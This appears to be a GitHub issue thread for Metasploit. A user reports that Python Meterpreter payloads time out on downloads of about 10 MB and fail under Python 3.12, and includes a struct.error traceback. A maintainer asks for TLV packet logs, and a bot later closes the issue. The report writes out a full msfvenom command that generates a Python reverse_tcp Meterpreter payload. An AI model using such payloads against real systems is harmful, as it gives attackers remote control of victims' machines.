Python meterpreter fails to download/upload large files (up to 10 MB) - Bug?

[Admin9961]

My msf version: "metasploit v6.3.44-dev-"
my OS: Linux
My network rate speed: 100 GBps
Target OS: Windows 10, equipped with Python3.12. The error happened on Unix VMs with various python versions aswell. I tried to compile the .py in an .exe using Pyinstaller to see how it behaves with various Python versions, and it keeps crashing. Possibly a bug

The error is a timeout exception, the verbose output says to increase the delays, but it doesn't work (keep crashing even when increasing delays).

This doesn't happen with all other meterpreter variants, just with all python meterpreter payloads.

Additional configuration:
msfvenom command msfvenom -p python/meterpreter/reverse_tcp lhost=IP lport=myownport -f raw -o output.py

[adfoster-r7]

If you log the TLV packets, does that help shed any light?

https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/Meterpreter-Debugging-Meterpreter-Sessions.md#log-meterpreter-tlv-packets

Note that the logging may clutter up your msfconsole

[Admin9961]

Upon running command "ls" and "download" I get this error in the debug console, only if output.py is ran from Python 3.12 on Windows and Linux aswell. On MSF side is "stdapi_fs_stat: Operation failed: Unknown error"
Snippet - I used python/meterpreter/reverse_tcp:
"DEBUG:root:Traceback (most recent call last):
File "", line 1717, in create_response
File "ext_server_stdapi.py", line 2084, in stdapi_fs_stat
File "ext_server_stdapi.py", line 897, in get_stat_buffer
struct.error: 'I' format requires 0 <= number <= 4294967295"

With Python 3.8 ( before upgrading to 3.12) I didn't get errors in running these commands, but upon downloading large files (say 10-15 MB with a good connection) the download did randomly failed, and it never did that with native C Meterpreter. I think the python stager is made for an older version of Python that faced a deprecation library issue... Maybe the 2.7 variant... I don't have much time to investigate this, sadly.

[adfoster-r7]

Thanks for taking a look!

When you say 10mb, do you mean 10gb? 👀

[Admin9961]

Nope, 10 mb. It can still transfer small size file ranging from 2 mb to 5-6 mb with no problems. Large downloads ( 10 mb or more will 100% fail with a timeout error) I pinpoint again, I have 100 GBps connection speed. The C variant x86/x64 can download 300 MB with no issues.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.